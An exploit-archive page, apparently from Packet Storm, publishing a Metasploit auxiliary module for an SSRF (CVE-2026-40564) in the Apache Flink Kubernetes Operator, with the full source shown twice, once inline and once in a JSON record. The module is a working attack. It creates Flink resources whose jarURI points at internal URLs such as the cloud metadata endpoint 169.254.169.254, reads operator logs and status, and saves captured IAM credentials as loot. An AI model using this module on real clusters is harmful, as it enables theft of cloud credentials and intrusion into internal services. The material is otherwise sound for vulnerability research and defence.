📄 Apache Flink Kubernetes Operator 1.14.0 Server-Side Request Forgery

6.5 / 10

MEDIUM

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Description

This is a Metasploit auxiliary module to demonstrate a service-side request forgery vulnerability in Apache Flink Kubernetes Operator version 1.14.0...

Visit Original Source

Basic Information

ID PACKETSTORM:223516

Published Jun 16, 2026 at 00:00

Affected Product

Affected Versions ==================================================================================================================================
| # Title : Apache Flink Kubernetes Operator 1.14.0 SSRF Exploit Module |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits) |
| # Vendor : https://flink.apache.org/ |
==================================================================================================================================

[+] Summary : This is a Metasploit auxiliary module for CVE-2026-40564, a Server-Side Request Forgery (SSRF) vulnerability in the Apache Flink Kubernetes Operator

[+] POC :

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Apache Flink Kubernetes Operator SSRF (CVE-2026-40564)',
'Description' => %q{
A Server-Side Request Forgery (SSRF) vulnerability exists in the Apache
Flink Kubernetes Operator versions 1.14.0 through 1.15-SNAPSHOT (as of
2026-04-09). The operator does not validate the `spec.job.jarURI` field
on FlinkSessionJob or FlinkDeployment resources. Anyone who can create
these resources can set the jarURI to any URL, including internal services,
cloud metadata endpoints, or filesystem paths.

When the operator reconciles the resource, it fetches the URL from inside
its own pod, enabling attackers to:
- Read cloud instance metadata (AWS/GCE/Azure IAM credentials)
- Access internal cluster services
- Read local files via file:// scheme
- Scan internal ports

This module provides detection and exploitation capabilities for this
SSRF vulnerability.
},
'Author' => ['indoushka'],
'References' => [
['CVE', '2026-40564'],
['URL', 'https://lists.apache.org/thread/o1b3c08boc8fc9zw9qff5wsd3oc0l6sw'],
['URL', 'https://flink.apache.org/2026/05/28/flink-kubernetes-operator-ssrf-cve-2026-40564/']
],
'DisclosureDate' => '2026-05-28',
'License' => MSF_LICENSE,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [],
'SideEffects' => [IOC_IN_LOGS]
}
)
)
register_options([
OptString.new('TARGETURI', [true, 'Base Kubernetes API path', '/']),
OptString.new('NAMESPACE', [false, 'Kubernetes namespace', 'default']),
OptString.new('OPERATOR_POD', [false, 'Operator pod name (auto-detected if not set)']),
OptString.new('SSRF_URL', [true, 'Target URL for SSRF (e.g., http://169.254.169.254/latest/meta-data/)']),
OptString.new('RESOURCE_NAME', [false, 'FlinkSessionJob resource name', 'ssrf-exploit']),
OptString.new('BEARER_TOKEN', [false, 'Kubernetes API bearer token']),
OptBool.new('USE_SESSION_CLUSTER', [true, 'Use FlinkSessionJob instead of FlinkDeployment', true]),
OptInt.new('TIMEOUT', [false, 'HTTP request timeout', 30])
])
end

def k8s_api_url
"https://#{datastore['RHOST']}:#{datastore['RPORT']}"
end

def k8s_headers
headers = { 'Content-Type' => 'application/json' }

if datastore['BEARER_TOKEN'] && !datastore['BEARER_TOKEN'].empty?
headers['Authorization'] = "Bearer #{datastore['BEARER_TOKEN']}"
end

headers
end
def get_operator_pod
namespace = datastore['NAMESPACE']
url = "#{k8s_api_url}/api/v1/namespaces/#{namespace}/pods"

res = send_request_cgi(
'method' => 'GET',
'uri' => url,
'headers' => k8s_headers,
'ssl' => true
)
if res && res.code == 200
begin
pods = JSON.parse(res.body)
pods['items'].each do |pod|
if pod['metadata']['name'] =~ /flink-kubernetes-operator/
operator_pod = pod['metadata']['name']
print_good("Found operator pod: #{operator_pod}")
return operator_pod
end
end
rescue JSON::ParserError
print_error("Failed to parse pods response")
end
end
nil
end
def create_flink_session_job(resource_name, namespace, jar_uri)
print_status("Creating FlinkSessionJob resource: #{resource_name}")
session_job = {
apiVersion: "flink.apache.org/v1beta1",
kind: "FlinkSessionJob",
metadata: {
name: resource_name,
namespace: namespace
},
spec: {
job: {
jarURI: jar_uri,
parallelism: 1,
upgradeMode: "stateless"
},
flinkConfiguration: {},
jobManager: {},
taskManager: {}
}
}
url = "#{k8s_api_url}/apis/flink.apache.org/v1beta1/namespaces/#{namespace}/flinksessionjobs"

res = send_request_cgi(
'method' => 'POST',
'uri' => url,
'headers' => k8s_headers,
'data' => session_job.to_json,
'ssl' => true
)
if res && res.code == 201
print_good("FlinkSessionJob created successfully")
return true
else
print_error("Failed to create FlinkSessionJob: HTTP #{res&.code}")
return false
end
end
def create_flink_deployment(resource_name, namespace, jar_uri)
print_status("Creating FlinkDeployment resource: #{resource_name}")
deployment = {
apiVersion: "flink.apache.org/v1beta1",
kind: "FlinkDeployment",
metadata: {
name: resource_name,
namespace: namespace
},
spec: {
flinkVersion: "v1_17",
flinkConfiguration: {},
jobManager: {},
taskManager: {},
job: {
jarURI: jar_uri,
parallelism: 1,
upgradeMode: "stateless"
}
}
}

url = "#{k8s_api_url}/apis/flink.apache.org/v1beta1/namespaces/#{namespace}/flinkdeployments"

res = send_request_cgi(
'method' => 'POST',
'uri' => url,
'headers' => k8s_headers,
'data' => deployment.to_json,
'ssl' => true
)

if res && res.code == 201
print_good("FlinkDeployment created successfully")
return true
else
print_error("Failed to create FlinkDeployment: HTTP #{res&.code}")
return false
end
end

def get_resource_status(resource_name, namespace)
resource_type = datastore['USE_SESSION_CLUSTER'] ? 'flinksessionjobs' : 'flinkdeployments'
url = "#{k8s_api_url}/apis/flink.apache.org/v1beta1/namespaces/#{namespace}/#{resource_type}/#{resource_name}"
res = send_request_cgi(
'method' => 'GET',
'uri' => url,
'headers' => k8s_headers,
'ssl' => true
)
if res && res.code == 200
begin
return JSON.parse(res.body)
rescue JSON::ParserError
return nil
end
end
nil
end
def get_operator_logs(pod_name, namespace)
url = "#{k8s_api_url}/api/v1/namespaces/#{namespace}/pods/#{pod_name}/log"
res = send_request_cgi(
'method' => 'GET',
'uri' => url,
'headers' => k8s_headers,
'ssl' => true
)
if res && res.code == 200
return res.body
end

nil
end
def check_ssrf_in_logs(logs, target_url)
if logs && logs.include?('HttpArtifactFetcher.fetch') && logs.include?(target_url)
print_good("SSRF confirmed in operator logs")
return true
end
false
end
def delete_resource(resource_name, namespace)
resource_type = datastore['USE_SESSION_CLUSTER'] ? 'flinksessionjobs' : 'flinkdeployments'
url = "#{k8s_api_url}/apis/flink.apache.org/v1beta1/namespaces/#{namespace}/#{resource_type}/#{resource_name}"

res = send_request_cgi(
'method' => 'DELETE',
'uri' => url,
'headers' => k8s_headers,
'ssl' => true
)
if res && [200, 202, 204].include?(res.code)
print_good("Resource deleted successfully")
return true
else
print_warning("Failed to delete resource: HTTP #{res&.code}")
return false
end
end
def extract_metadata_response(response_body)
if response_body && !response_body.empty?
print_good("SSRF response received:")
print_line(response_body[0..1000])

if response_body.include?('iam') || response_body.include?('security-credentials')
print_good("Potential IAM credentials detected!")
role_match = response_body.match(/([a-zA-Z0-9\-_]+)/)
if role_match
print_status("IAM Role detected: #{role_match[1]}")
end
end
return true
end
false
end
def cleanup(resource_name, namespace)
print_status("Cleaning up resources...")
delete_resource(resource_name, namespace)
end
def check_permissions(namespace)
url = "#{k8s_api_url}/apis/flink.apache.org/v1beta1/namespaces/#{namespace}/flinksessionjobs"

res = send_request_cgi(
'method' => 'POST',
'uri' => url,
'headers' => k8s_headers,
'data' => {}.to_json, # Empty body to test permissions
'ssl' => true
)

if res && (res.code == 201 || res.code == 403)
if res.code == 403
print_error("Insufficient permissions to create Flink resources")
return false
else
print_good("Sufficient permissions to create Flink resources")
return true
end
end

print_warning("Could not determine permissions")
true
end

def run_host(ip)
print_status("CVE-2026-40564 - Apache Flink Kubernetes Operator SSRF")
print_status("Target: #{peer}")
print_status("SSRF Target URL: #{datastore['SSRF_URL']}")

namespace = datastore['NAMESPACE']
resource_name = "#{datastore['RESOURCE_NAME']}-#{Rex::Text.rand_text_alpha_lower(6)}"

print_status("Checking Kubernetes API connectivity...")
version_url = "#{k8s_api_url}/version"

res = send_request_cgi(
'method' => 'GET',
'uri' => version_url,
'headers' => k8s_headers,
'ssl' => true
)

unless res && res.code == 200
print_error("Cannot connect to Kubernetes API. Check RHOST, RPORT, and credentials.")
return
end

print_good("Connected to Kubernetes API")

unless check_permissions(namespace)
print_error("Insufficient permissions to exploit SSRF")
return
end

print_status("Creating malicious Flink resource...")

if datastore['USE_SESSION_CLUSTER']
success = create_flink_session_job(resource_name, namespace, datastore['SSRF_URL'])
else
success = create_flink_deployment(resource_name, namespace, datastore['SSRF_URL'])
end

unless success
print_error("Failed to create malicious resource")
return
end

print_status("Waiting for operator reconciliation (15 seconds)...")
Rex.sleep(15)

status = get_resource_status(resource_name, namespace)

if status && status['status']
print_status("Resource status: #{status['status'].to_json[0..200]}")

if status['status'].to_s.include?('Failed to fetch') ||
status['status'].to_s.include?('Connection refused') ||
status['status'].to_s.include?('connect timed out')
print_good("SSRF attempt confirmed - operator tried to fetch the URL")
end
end

operator_pod = datastore['OPERATOR_POD']
if operator_pod.nil? || operator_pod.empty?
operator_pod = get_operator_pod
end

if operator_pod
print_status("Fetching operator logs...")
logs = get_operator_logs(operator_pod, namespace)

if logs && logs.include?(datastore['SSRF_URL'])
print_good("SSRF CONFIRMED - operator fetched the URL!")

if logs =~ /GET.*?#{Regexp.escape(datastore['SSRF_URL'])}/
print_good("HTTP GET request to #{datastore['SSRF_URL']} found in logs")
end

if logs =~ /HttpArtifactFetcher\.fetch/
print_good("HttpArtifactFetcher call confirmed")
end
end
end

if datastore['SSRF_URL'].include?('169.254.169.254') || datastore['SSRF_URL'].include?('metadata')
print_status("Attempting to read AWS metadata response...")

metadata_url = datastore['SSRF_URL']
if !metadata_url.end_with?('/')
metadata_url = metadata_url + '/'
end

if datastore['USE_SESSION_CLUSTER']
create_flink_session_job("#{resource_name}-metadata", namespace, metadata_url)
else
create_flink_deployment("#{resource_name}-metadata", namespace, metadata_url)
end

Rex.sleep(10)

metadata_status = get_resource_status("#{resource_name}-metadata", namespace)

if metadata_status && metadata_status['status']
status_text = metadata_status['status'].to_s
if status_text.include?('iam') || status_text.include?('security-credentials')
print_good("Extracted metadata:")
print_line(status_text[0..500])

store_loot(
'flink.ssrf.metadata',
'text/plain',
ip,
status_text,
'aws_metadata.txt',
'AWS metadata captured via SSRF'
)
end
end

if datastore['USE_SESSION_CLUSTER']
delete_resource("#{resource_name}-metadata", namespace)
else
delete_resource("#{resource_name}-metadata", namespace)
end
end

report_vuln(
host: ip,
port: datastore['RPORT'],
name: name,
refs: references,
info: "Apache Flink Kubernetes Operator SSRF (CVE-2026-40564) - Able to fetch #{datastore['SSRF_URL']}"
)
if datastore['Cleanup']
cleanup(resource_name, namespace)
else
print_status("Resource #{resource_name} left for manual inspection")
print_status("Clean up with: kubectl delete -n #{namespace} #{datastore['USE_SESSION_CLUSTER'] ? 'flinksessionjob' : 'flinkdeployment'} #{resource_name}")
end

print_good("SSRF exploitation completed")
end
end

Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================

{
    "lastseen": "2026-06-16T15:59:23",
    "description": "This is a Metasploit auxiliary module to demonstrate a service-side request forgery vulnerability in Apache Flink Kubernetes Operator version 1.14.0...",
    "published": "2026-06-16T00:00:00",
    "modified": "2026-06-16T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Apache Flink Kubernetes Operator 1.14.0 Server-Side Request Forgery",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:223516",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2026-40564"
    ],
    "sourceData": "==================================================================================================================================\n    | # Title     : Apache Flink Kubernetes Operator 1.14.0 SSRF Exploit Module                                                      |\n    | # Author    : indoushka                                                                                                        |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits)                                                 |\n    | # Vendor    : https://flink.apache.org/                                                                                        |\n    ==================================================================================================================================\n    \n    [+] Summary    :  This is a Metasploit auxiliary module for CVE-2026-40564, a Server-Side Request Forgery (SSRF) vulnerability in the Apache Flink Kubernetes Operator\n    \n    [+] POC        :  \n    \n    ##\n    # This module requires Metasploit: https://metasploit.com/download\n    # Current source: https://github.com/rapid7/metasploit-framework\n    ##\n    \n    class MetasploitModule < Msf::Auxiliary\n      include Msf::Exploit::Remote::HttpClient\n      include Msf::Auxiliary::Scanner\n      include Msf::Auxiliary::Report\n    \n      def initialize(info = {})\n        super(\n          update_info(\n            info,\n            'Name' => 'Apache Flink Kubernetes Operator SSRF (CVE-2026-40564)',\n            'Description' => %q{\n              A Server-Side Request Forgery (SSRF) vulnerability exists in the Apache\n              Flink Kubernetes Operator versions 1.14.0 through 1.15-SNAPSHOT (as of\n              2026-04-09). The operator does not validate the `spec.job.jarURI` field\n              on FlinkSessionJob or FlinkDeployment resources. Anyone who can create\n              these resources can set the jarURI to any URL, including internal services,\n              cloud metadata endpoints, or filesystem paths.\n    \n              When the operator reconciles the resource, it fetches the URL from inside\n              its own pod, enabling attackers to:\n              - Read cloud instance metadata (AWS/GCE/Azure IAM credentials)\n              - Access internal cluster services\n              - Read local files via file:// scheme\n              - Scan internal ports\n    \n              This module provides detection and exploitation capabilities for this\n              SSRF vulnerability.\n            },\n            'Author' => ['indoushka'],\n            'References' => [\n              ['CVE', '2026-40564'],\n              ['URL', 'https://lists.apache.org/thread/o1b3c08boc8fc9zw9qff5wsd3oc0l6sw'],\n              ['URL', 'https://flink.apache.org/2026/05/28/flink-kubernetes-operator-ssrf-cve-2026-40564/']\n            ],\n            'DisclosureDate' => '2026-05-28',\n            'License' => MSF_LICENSE,\n            'Notes' => {\n              'Stability' => [CRASH_SAFE],\n              'Reliability' => [],\n              'SideEffects' => [IOC_IN_LOGS]\n            }\n          )\n        )\n        register_options([\n          OptString.new('TARGETURI', [true, 'Base Kubernetes API path', '/']),\n          OptString.new('NAMESPACE', [false, 'Kubernetes namespace', 'default']),\n          OptString.new('OPERATOR_POD', [false, 'Operator pod name (auto-detected if not set)']),\n          OptString.new('SSRF_URL', [true, 'Target URL for SSRF (e.g., http://169.254.169.254/latest/meta-data/)']),\n          OptString.new('RESOURCE_NAME', [false, 'FlinkSessionJob resource name', 'ssrf-exploit']),\n          OptString.new('BEARER_TOKEN', [false, 'Kubernetes API bearer token']),\n          OptBool.new('USE_SESSION_CLUSTER', [true, 'Use FlinkSessionJob instead of FlinkDeployment', true]),\n          OptInt.new('TIMEOUT', [false, 'HTTP request timeout', 30])\n        ])\n      end\n    \n      def k8s_api_url\n        \"https://#{datastore['RHOST']}:#{datastore['RPORT']}\"\n      end\n    \n      def k8s_headers\n        headers = { 'Content-Type' => 'application/json' }\n    \n        if datastore['BEARER_TOKEN'] && !datastore['BEARER_TOKEN'].empty?\n          headers['Authorization'] = \"Bearer #{datastore['BEARER_TOKEN']}\"\n        end\n        \n        headers\n      end\n      def get_operator_pod\n        namespace = datastore['NAMESPACE']\n        url = \"#{k8s_api_url}/api/v1/namespaces/#{namespace}/pods\"\n        \n        res = send_request_cgi(\n          'method' => 'GET',\n          'uri' => url,\n          'headers' => k8s_headers,\n          'ssl' => true\n        )\n        if res && res.code == 200\n          begin\n            pods = JSON.parse(res.body)\n            pods['items'].each do |pod|\n              if pod['metadata']['name'] =~ /flink-kubernetes-operator/\n                operator_pod = pod['metadata']['name']\n                print_good(\"Found operator pod: #{operator_pod}\")\n                return operator_pod\n              end\n            end\n          rescue JSON::ParserError\n            print_error(\"Failed to parse pods response\")\n          end\n        end\n        nil\n      end\n      def create_flink_session_job(resource_name, namespace, jar_uri)\n        print_status(\"Creating FlinkSessionJob resource: #{resource_name}\")\n        session_job = {\n          apiVersion: \"flink.apache.org/v1beta1\",\n          kind: \"FlinkSessionJob\",\n          metadata: {\n            name: resource_name,\n            namespace: namespace\n          },\n          spec: {\n            job: {\n              jarURI: jar_uri,\n              parallelism: 1,\n              upgradeMode: \"stateless\"\n            },\n            flinkConfiguration: {},\n            jobManager: {},\n            taskManager: {}\n          }\n        }\n        url = \"#{k8s_api_url}/apis/flink.apache.org/v1beta1/namespaces/#{namespace}/flinksessionjobs\"\n        \n        res = send_request_cgi(\n          'method' => 'POST',\n          'uri' => url,\n          'headers' => k8s_headers,\n          'data' => session_job.to_json,\n          'ssl' => true\n        )\n        if res && res.code == 201\n          print_good(\"FlinkSessionJob created successfully\")\n          return true\n        else\n          print_error(\"Failed to create FlinkSessionJob: HTTP #{res&.code}\")\n          return false\n        end\n      end\n      def create_flink_deployment(resource_name, namespace, jar_uri)\n        print_status(\"Creating FlinkDeployment resource: #{resource_name}\")\n        deployment = {\n          apiVersion: \"flink.apache.org/v1beta1\",\n          kind: \"FlinkDeployment\",\n          metadata: {\n            name: resource_name,\n            namespace: namespace\n          },\n          spec: {\n            flinkVersion: \"v1_17\",\n            flinkConfiguration: {},\n            jobManager: {},\n            taskManager: {},\n            job: {\n              jarURI: jar_uri,\n              parallelism: 1,\n              upgradeMode: \"stateless\"\n            }\n          }\n        }\n        \n        url = \"#{k8s_api_url}/apis/flink.apache.org/v1beta1/namespaces/#{namespace}/flinkdeployments\"\n        \n        res = send_request_cgi(\n          'method' => 'POST',\n          'uri' => url,\n          'headers' => k8s_headers,\n          'data' => deployment.to_json,\n          'ssl' => true\n        )\n        \n        if res && res.code == 201\n          print_good(\"FlinkDeployment created successfully\")\n          return true\n        else\n          print_error(\"Failed to create FlinkDeployment: HTTP #{res&.code}\")\n          return false\n        end\n      end\n    \n      def get_resource_status(resource_name, namespace)\n        resource_type = datastore['USE_SESSION_CLUSTER'] ? 'flinksessionjobs' : 'flinkdeployments'\n        url = \"#{k8s_api_url}/apis/flink.apache.org/v1beta1/namespaces/#{namespace}/#{resource_type}/#{resource_name}\"\n        res = send_request_cgi(\n          'method' => 'GET',\n          'uri' => url,\n          'headers' => k8s_headers,\n          'ssl' => true\n        )\n        if res && res.code == 200\n          begin\n            return JSON.parse(res.body)\n          rescue JSON::ParserError\n            return nil\n          end\n        end\n        nil\n      end\n      def get_operator_logs(pod_name, namespace)\n        url = \"#{k8s_api_url}/api/v1/namespaces/#{namespace}/pods/#{pod_name}/log\"\n        res = send_request_cgi(\n          'method' => 'GET',\n          'uri' => url,\n          'headers' => k8s_headers,\n          'ssl' => true\n        )\n        if res && res.code == 200\n          return res.body\n        end\n    \n        nil\n      end\n      def check_ssrf_in_logs(logs, target_url)\n        if logs && logs.include?('HttpArtifactFetcher.fetch') && logs.include?(target_url)\n          print_good(\"SSRF confirmed in operator logs\")\n          return true\n        end\n        false\n      end\n      def delete_resource(resource_name, namespace)\n        resource_type = datastore['USE_SESSION_CLUSTER'] ? 'flinksessionjobs' : 'flinkdeployments'\n        url = \"#{k8s_api_url}/apis/flink.apache.org/v1beta1/namespaces/#{namespace}/#{resource_type}/#{resource_name}\"\n        \n        res = send_request_cgi(\n          'method' => 'DELETE',\n          'uri' => url,\n          'headers' => k8s_headers,\n          'ssl' => true\n        )\n        if res && [200, 202, 204].include?(res.code)\n          print_good(\"Resource deleted successfully\")\n          return true\n        else\n          print_warning(\"Failed to delete resource: HTTP #{res&.code}\")\n          return false\n        end\n      end\n      def extract_metadata_response(response_body)\n        if response_body && !response_body.empty?\n          print_good(\"SSRF response received:\")\n          print_line(response_body[0..1000])\n    \n          if response_body.include?('iam') || response_body.include?('security-credentials')\n            print_good(\"Potential IAM credentials detected!\")\n            role_match = response_body.match(/([a-zA-Z0-9\\-_]+)/)\n            if role_match\n              print_status(\"IAM Role detected: #{role_match[1]}\")\n            end\n          end\n          return true\n        end\n        false\n      end\n      def cleanup(resource_name, namespace)\n        print_status(\"Cleaning up resources...\")\n        delete_resource(resource_name, namespace)\n      end\n      def check_permissions(namespace)\n        url = \"#{k8s_api_url}/apis/flink.apache.org/v1beta1/namespaces/#{namespace}/flinksessionjobs\"\n        \n        res = send_request_cgi(\n          'method' => 'POST',\n          'uri' => url,\n          'headers' => k8s_headers,\n          'data' => {}.to_json,  # Empty body to test permissions\n          'ssl' => true\n        )\n        \n        if res && (res.code == 201 || res.code == 403)\n          if res.code == 403\n            print_error(\"Insufficient permissions to create Flink resources\")\n            return false\n          else\n            print_good(\"Sufficient permissions to create Flink resources\")\n            return true\n          end\n        end\n        \n        print_warning(\"Could not determine permissions\")\n        true  \n      end\n    \n      def run_host(ip)\n        print_status(\"CVE-2026-40564 - Apache Flink Kubernetes Operator SSRF\")\n        print_status(\"Target: #{peer}\")\n        print_status(\"SSRF Target URL: #{datastore['SSRF_URL']}\")\n        \n        namespace = datastore['NAMESPACE']\n        resource_name = \"#{datastore['RESOURCE_NAME']}-#{Rex::Text.rand_text_alpha_lower(6)}\"\n    \n        print_status(\"Checking Kubernetes API connectivity...\")\n        version_url = \"#{k8s_api_url}/version\"\n        \n        res = send_request_cgi(\n          'method' => 'GET',\n          'uri' => version_url,\n          'headers' => k8s_headers,\n          'ssl' => true\n        )\n        \n        unless res && res.code == 200\n          print_error(\"Cannot connect to Kubernetes API. Check RHOST, RPORT, and credentials.\")\n          return\n        end\n        \n        print_good(\"Connected to Kubernetes API\")\n    \n        unless check_permissions(namespace)\n          print_error(\"Insufficient permissions to exploit SSRF\")\n          return\n        end\n    \n        print_status(\"Creating malicious Flink resource...\")\n        \n        if datastore['USE_SESSION_CLUSTER']\n          success = create_flink_session_job(resource_name, namespace, datastore['SSRF_URL'])\n        else\n          success = create_flink_deployment(resource_name, namespace, datastore['SSRF_URL'])\n        end\n        \n        unless success\n          print_error(\"Failed to create malicious resource\")\n          return\n        end\n    \n        print_status(\"Waiting for operator reconciliation (15 seconds)...\")\n        Rex.sleep(15)\n    \n        status = get_resource_status(resource_name, namespace)\n        \n        if status && status['status']\n          print_status(\"Resource status: #{status['status'].to_json[0..200]}\")\n    \n          if status['status'].to_s.include?('Failed to fetch') ||\n             status['status'].to_s.include?('Connection refused') ||\n             status['status'].to_s.include?('connect timed out')\n            print_good(\"SSRF attempt confirmed - operator tried to fetch the URL\")\n          end\n        end\n    \n        operator_pod = datastore['OPERATOR_POD']\n        if operator_pod.nil? || operator_pod.empty?\n          operator_pod = get_operator_pod\n        end\n        \n        if operator_pod\n          print_status(\"Fetching operator logs...\")\n          logs = get_operator_logs(operator_pod, namespace)\n          \n          if logs && logs.include?(datastore['SSRF_URL'])\n            print_good(\"SSRF CONFIRMED - operator fetched the URL!\")\n    \n            if logs =~ /GET.*?#{Regexp.escape(datastore['SSRF_URL'])}/\n              print_good(\"HTTP GET request to #{datastore['SSRF_URL']} found in logs\")\n            end\n            \n            if logs =~ /HttpArtifactFetcher\\.fetch/\n              print_good(\"HttpArtifactFetcher call confirmed\")\n            end\n          end\n        end\n    \n        if datastore['SSRF_URL'].include?('169.254.169.254') || datastore['SSRF_URL'].include?('metadata')\n          print_status(\"Attempting to read AWS metadata response...\")\n    \n          metadata_url = datastore['SSRF_URL']\n          if !metadata_url.end_with?('/')\n            metadata_url = metadata_url + '/'\n          end\n          \n          if datastore['USE_SESSION_CLUSTER']\n            create_flink_session_job(\"#{resource_name}-metadata\", namespace, metadata_url)\n          else\n            create_flink_deployment(\"#{resource_name}-metadata\", namespace, metadata_url)\n          end\n          \n          Rex.sleep(10)\n    \n          metadata_status = get_resource_status(\"#{resource_name}-metadata\", namespace)\n          \n          if metadata_status && metadata_status['status']\n            status_text = metadata_status['status'].to_s\n            if status_text.include?('iam') || status_text.include?('security-credentials')\n              print_good(\"Extracted metadata:\")\n              print_line(status_text[0..500])\n    \n              store_loot(\n                'flink.ssrf.metadata',\n                'text/plain',\n                ip,\n                status_text,\n                'aws_metadata.txt',\n                'AWS metadata captured via SSRF'\n              )\n            end\n          end\n    \n          if datastore['USE_SESSION_CLUSTER']\n            delete_resource(\"#{resource_name}-metadata\", namespace)\n          else\n            delete_resource(\"#{resource_name}-metadata\", namespace)\n          end\n        end\n    \n        report_vuln(\n          host: ip,\n          port: datastore['RPORT'],\n          name: name,\n          refs: references,\n          info: \"Apache Flink Kubernetes Operator SSRF (CVE-2026-40564) - Able to fetch #{datastore['SSRF_URL']}\"\n        )\n        if datastore['Cleanup']\n          cleanup(resource_name, namespace)\n        else\n          print_status(\"Resource #{resource_name} left for manual inspection\")\n          print_status(\"Clean up with: kubectl delete -n #{namespace} #{datastore['USE_SESSION_CLUSTER'] ? 'flinksessionjob' : 'flinkdeployment'} #{resource_name}\")\n        end\n        \n        print_good(\"SSRF exploitation completed\")\n      end\n    end\n    \n    Greetings to :==============================================================================\n    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\n    ============================================================================================",
    "sourceHref": "https://packetstorm.news/download/223516",
    "cvss": {
        "score": 6.5,
        "severity": "MEDIUM",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/223516/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

📄 Apache Flink Kubernetes Operator 1.14.0 Server-Side Request Forgery_PACKETSTORM:223516

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply